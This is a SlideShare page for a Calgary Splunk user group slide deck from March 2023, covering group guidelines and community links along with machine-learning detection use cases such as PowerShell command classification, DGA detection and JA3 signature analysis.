SlideShare a Scribd company logo

Calgary-Splunk-User-Group-March-2023.pdf

P
PremDomingo

Short overview of Splunk User Group and AIops Use-cases

Technology
1 of 16
Download to read offline
© 2023 SPLUNK INC. Splunk User Group Reboot March 2023
© 2023 SPLUNK INC. Splunk T-Shirt Company It’s not just a Platform …. it’s a Lifestyle!!
© 2023 SPLUNK INC. Steering Committee We can always use an extra hand!
© 2023 SPLUNK INC. User Group Guidelines ● GOAL: Create an authentic, technical forum to share ideas, use-cases and best practices ● Led by the community - This is not a Sales Forum ● Presentations should be approx. 30 mins with time for discussion ● 2 or 3 topics per meet up (helps broaden the interest) ● Discuss if we want to rotate locations (have some virtual events) ● The group can determine the frequency (at least 1 meeting per quarter) What to Expect from this forum
© 2023 SPLUNK INC. Become an ACTIVE participant! ● Join the Calgary Splunk User Group ○ https://usergroups.splunk.com/calgary-splunk-user-group/ ○ ● Join the Calgary Community Hub ○ Posts, Blogs, Idea Exchange ○ https://community.splunk.com/t5/Calgary-User-Group/gh-p/CalgaryUserGroup ○ ● Join the Calgary Slack channel ○ Easy connection ○ http://splk.it/slack ○ #calgary A little bit of setup …. for a whole lot of valuable information
© 2023 SPLUNK INC. Community Resources ● Find Splunk events and seminars in your region: https://www.splunk.com/en_us/about-us/events.html ● Leverage Splunk Community Resources: Splunk Answers: Submit questions, Search previous answers, Splunk IDEAS: Submit ideas for product enhancements or upvote existing ideas https://www.splunk.com/en_us/community.html ● Check out other Splunk User Groups for interesting topics and ideas Leverage your peers
© 2023 SPLUNK INC. Some Sample Topics ● XRDR (Cross Region Disaster Recovery) ● Federated Search ● Ingest Actions & Edge Processor ● Risk Based Alerting ● How Security & O11Y Align ● Building Better Dashboards ● Innovative Vertically Aligned Use Cases (Industry specific use-cases) Please be vocal on what interests you
© 2023 SPLUNK INC. .CONF23 - July 17 - 20th Las Vegas, NV
© 2023 SPLUNK INC. Please Complete the Survey Help us Drive the focus and direction of this Group!
© 2023 SPLUNK INC. Thank You!
© 2023 SPLUNK INC. Building AIOps Use Cases in Splunk March 2023
© 2023 SPLUNK INC. Splunk App for Data Science & Deep Learning (DSDL) Built for Data Scientists and Splunk Users • Code Examples: Guided model building, testing, and deployment of deep learning frameworks and other data science and machine learning examples and algorithms • Container Management: Containers & models can be productionized for scalability & optimization of resources, e.g. CPU & GPU • Frameworks: PyTorch, Tensorflow, SpaCy, DASK, Rapids, Spark, … • Tools: Jupyter Lab Notebooks, Tensorboard, MLflow, Spark, GIT, … Extensible to operationalize any use case • Open Source: New frameworks & Python Libraries freely available for integration into DSDL via github • Acceleration: Support for GPU accelerated data science, machine learning, deep learning or other inference pipelines Extension for MLTK to operationalize advanced custom AI / ML use cases
© 2023 SPLUNK INC. Powershell Command-Line Classification Methods: - Count Tokenization - Logistic regression Technologies: - MLTK - Custom Pre-Trained Model Deployment Requirements: - Labelled dataset Details: - Content Page - ESCU Tokenization and Classification could be applied to a wide range of other data sources: User-Agents? Web access logs?
© 2023 SPLUNK INC. Windows Event Code Clustering + Anomaly Detection Methods: - Statistical Analysis - Clustering (DBScan) - Unsupervised Technologies: - MLTK Requirements: - Windows event code data - Well controlled environment Details: - .conf21
© 2023 SPLUNK INC. Domain Generation Algorithm Detection Methods: - Feature Engineering - Text Entropy - PCA - Ngram Analysis Technologies: - MLTK/DSDL Requirements: - DNS Data Details: - DGA App - MLTK - ESCU Content - DSDL A very good example of an application of labelled data to a useful classifier in Splunk
© 2023 SPLUNK INC. JA3 Signature Analysis Methods: - One-hot Encoding - UMAP Technologies: - DSDL Requirements: - JA3 Signature Data (Zeek) Details: - Blog - Talk (Upcoming) - DSDL Notebook JA3 Signatures are a challenge to understand as they are very high cardinality. UMAP allows visualising a complex high-cardinality space. Could be extended to generic behaviors? Host Classification based on CIM features?

Recommended

Introduction to Smart Data Models
Introduction to Smart Data ModelsIntroduction to Smart Data Models
Introduction to Smart Data Models
FIWARE
 
Splunk .conf18 Updates, Config Add-on, SplDevOps
Splunk .conf18 Updates, Config Add-on, SplDevOpsSplunk .conf18 Updates, Config Add-on, SplDevOps
Splunk .conf18 Updates, Config Add-on, SplDevOps
Harry McLaren
 
FIWARE Training: Introduction to Smart Data Models
FIWARE Training: Introduction to Smart Data ModelsFIWARE Training: Introduction to Smart Data Models
FIWARE Training: Introduction to Smart Data Models
FIWARE
 
Splunk User Group Edinburgh - September Event
Splunk User Group Edinburgh - September EventSplunk User Group Edinburgh - September Event
Splunk User Group Edinburgh - September Event
Harry McLaren
 
Getting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionGetting Started with Splunk Breakout Session
Getting Started with Splunk Breakout Session
Splunk
 
Encontro anual para apresentação das novidades da .conf23
Encontro anual para apresentação das novidades da .conf23Encontro anual para apresentação das novidades da .conf23
Encontro anual para apresentação das novidades da .conf23
Rafael Santos
 
QuSandbox+NVIDIA Rapids
QuSandbox+NVIDIA RapidsQuSandbox+NVIDIA Rapids
QuSandbox+NVIDIA Rapids
QuantUniversity
 
2020 | Metadata Day | LinkedIn
2020 | Metadata Day | LinkedIn2020 | Metadata Day | LinkedIn
2020 | Metadata Day | LinkedIn
Deepak Chandramouli
 

Recommended

Introduction to Smart Data Models
Introduction to Smart Data ModelsIntroduction to Smart Data Models
Introduction to Smart Data Models
FIWARE
 
Splunk .conf18 Updates, Config Add-on, SplDevOps
Splunk .conf18 Updates, Config Add-on, SplDevOpsSplunk .conf18 Updates, Config Add-on, SplDevOps
Splunk .conf18 Updates, Config Add-on, SplDevOps
Harry McLaren
 
FIWARE Training: Introduction to Smart Data Models
FIWARE Training: Introduction to Smart Data ModelsFIWARE Training: Introduction to Smart Data Models
FIWARE Training: Introduction to Smart Data Models
FIWARE
 
Splunk User Group Edinburgh - September Event
Splunk User Group Edinburgh - September EventSplunk User Group Edinburgh - September Event
Splunk User Group Edinburgh - September Event
Harry McLaren
 
Getting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionGetting Started with Splunk Breakout Session
Getting Started with Splunk Breakout Session
Splunk
 
Encontro anual para apresentação das novidades da .conf23
Encontro anual para apresentação das novidades da .conf23Encontro anual para apresentação das novidades da .conf23
Encontro anual para apresentação das novidades da .conf23
Rafael Santos
 
QuSandbox+NVIDIA Rapids
QuSandbox+NVIDIA RapidsQuSandbox+NVIDIA Rapids
QuSandbox+NVIDIA Rapids
QuantUniversity
 
2020 | Metadata Day | LinkedIn
2020 | Metadata Day | LinkedIn2020 | Metadata Day | LinkedIn
2020 | Metadata Day | LinkedIn
Deepak Chandramouli
 
Relecura - Features Overview
Relecura - Features OverviewRelecura - Features Overview
Relecura - Features Overview
Relecura Inc.
 
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
IT Arena
 
Big data analytics fas trak solution overview
Big data analytics fas trak solution overviewBig data analytics fas trak solution overview
Big data analytics fas trak solution overview
Marc St-Pierre
 
Orchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANTOrchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANT
CSUC - Consorci de Serveis Universitaris de Catalunya
 
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptxAnypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
Akshata Sawant
 
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptxMuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
Steve Clarke
 
Splunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdfSplunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdf
djdhhdddhhd
 
Continuous delivery for machine learning
Continuous delivery for machine learningContinuous delivery for machine learning
Continuous delivery for machine learning
Rajesh Muppalla
 
Getting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-OnGetting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-On
Splunk
 
Maruti gollapudi cv
Maruti gollapudi cvMaruti gollapudi cv
Maruti gollapudi cv
Maruti Gollapudi
 
Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...
Alessandra Bagnato
 
MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...
OW2
 
BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview
BigData_Europe
 
Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements
Harry McLaren
 
Machine learning at scale challenges and solutions
Machine learning at scale challenges and solutionsMachine learning at scale challenges and solutions
Machine learning at scale challenges and solutions
Stavros Kontopoulos
 
Montreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptxMontreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptx
Sadik Ali
 
PSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best PracticesPSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best Practices
Tomas Moser
 
SplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - UnicreditSplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - Unicredit
Splunk
 
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE
 
ODSA - Business Workstream
ODSA - Business WorkstreamODSA - Business Workstream
ODSA - Business Workstream
ODSA Workgroup
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 

More Related Content

Similar to Calgary-Splunk-User-Group-March-2023.pdf

Relecura - Features Overview
Relecura - Features OverviewRelecura - Features Overview
Relecura - Features Overview
Relecura Inc.
 
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
IT Arena
 
Big data analytics fas trak solution overview
Big data analytics fas trak solution overviewBig data analytics fas trak solution overview
Big data analytics fas trak solution overview
Marc St-Pierre
 
Orchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANTOrchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANT
CSUC - Consorci de Serveis Universitaris de Catalunya
 
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptxAnypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
Akshata Sawant
 
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptxMuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
Steve Clarke
 
Splunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdfSplunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdf
djdhhdddhhd
 
Continuous delivery for machine learning
Continuous delivery for machine learningContinuous delivery for machine learning
Continuous delivery for machine learning
Rajesh Muppalla
 
Getting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-OnGetting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-On
Splunk
 
Maruti gollapudi cv
Maruti gollapudi cvMaruti gollapudi cv
Maruti gollapudi cv
Maruti Gollapudi
 
Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...
Alessandra Bagnato
 
MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...
OW2
 
BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview
BigData_Europe
 
Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements
Harry McLaren
 
Machine learning at scale challenges and solutions
Machine learning at scale challenges and solutionsMachine learning at scale challenges and solutions
Machine learning at scale challenges and solutions
Stavros Kontopoulos
 
Montreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptxMontreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptx
Sadik Ali
 
PSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best PracticesPSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best Practices
Tomas Moser
 
SplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - UnicreditSplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - Unicredit
Splunk
 
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE
 
ODSA - Business Workstream
ODSA - Business WorkstreamODSA - Business Workstream
ODSA - Business Workstream
ODSA Workgroup
 

Similar to Calgary-Splunk-User-Group-March-2023.pdf (20)

Relecura - Features Overview
Relecura - Features OverviewRelecura - Features Overview
Relecura - Features Overview
 
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
Learnings from Developing a New B2B SaaS Product (Suryaveer Lodha (Sunny) Pro...
 
Big data analytics fas trak solution overview
Big data analytics fas trak solution overviewBig data analytics fas trak solution overview
Big data analytics fas trak solution overview
 
Orchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANTOrchestration, Automation and Virtualisation (OAV) in GÉANT
Orchestration, Automation and Virtualisation (OAV) in GÉANT
 
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptxAnypoint Tools and MuleSoft Automation (DRAFT).pptx
Anypoint Tools and MuleSoft Automation (DRAFT).pptx
 
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptxMuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
MuleSoft Meetup #9 - Anypoint Tools and MuleSoft Automation (FINAL).pptx
 
Splunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdfSplunk4Rookies - Attendee - May 2023.pdf
Splunk4Rookies - Attendee - May 2023.pdf
 
Continuous delivery for machine learning
Continuous delivery for machine learningContinuous delivery for machine learning
Continuous delivery for machine learning
 
Getting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-OnGetting Started with Splunk Enterprise Hands-On
Getting Started with Splunk Enterprise Hands-On
 
Maruti gollapudi cv
Maruti gollapudi cvMaruti gollapudi cv
Maruti gollapudi cv
 
Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...Eurostars MODELS Project, System modeling and design exploration of applicati...
Eurostars MODELS Project, System modeling and design exploration of applicati...
 
MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...MODELS, a unified environment for the design of system applications on parall...
MODELS, a unified environment for the design of system applications on parall...
 
BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview BDE SC3.3 Workshop - BDE Platform: Technical overview
BDE SC3.3 Workshop - BDE Platform: Technical overview
 
Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements Latest Updates to Splunk from .conf 2017 Announcements
Latest Updates to Splunk from .conf 2017 Announcements
 
Machine learning at scale challenges and solutions
Machine learning at scale challenges and solutionsMachine learning at scale challenges and solutions
Machine learning at scale challenges and solutions
 
Montreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptxMontreal MuleSoft_Meetup_02-June.pptx
Montreal MuleSoft_Meetup_02-June.pptx
 
PSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best PracticesPSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 1 - 2024-01-22 - Onboarding Best Practices
 
SplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - UnicreditSplunkLive! Milano 2016 - customer presentation - Unicredit
SplunkLive! Milano 2016 - customer presentation - Unicredit
 
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
FIWARE Wednesday Webinars - NGSI-LD and Smart Data Models: Standard Access to...
 
ODSA - Business Workstream
ODSA - Business WorkstreamODSA - Business Workstream
ODSA - Business Workstream
 

Recently uploaded

PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 

Recently uploaded (20)

PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 

Calgary-Splunk-User-Group-March-2023.pdf

  • 1. © 2023 SPLUNK INC. Splunk User Group Reboot March 2023
  • 2. © 2023 SPLUNK INC. Splunk T-Shirt Company It’s not just a Platform …. it’s a Lifestyle!!
  • 3. © 2023 SPLUNK INC. Steering Committee We can always use an extra hand!
  • 4. © 2023 SPLUNK INC. User Group Guidelines ● GOAL: Create an authentic, technical forum to share ideas, use-cases and best practices ● Led by the community - This is not a Sales Forum ● Presentations should be approx. 30 mins with time for discussion ● 2 or 3 topics per meet up (helps broaden the interest) ● Discuss if we want to rotate locations (have some virtual events) ● The group can determine the frequency (at least 1 meeting per quarter) What to Expect from this forum
  • 5. © 2023 SPLUNK INC. Become an ACTIVE participant! ● Join the Calgary Splunk User Group ○ https://usergroups.splunk.com/calgary-splunk-user-group/ ○ ● Join the Calgary Community Hub ○ Posts, Blogs, Idea Exchange ○ https://community.splunk.com/t5/Calgary-User-Group/gh-p/CalgaryUserGroup ○ ● Join the Calgary Slack channel ○ Easy connection ○ http://splk.it/slack ○ #calgary A little bit of setup …. for a whole lot of valuable information
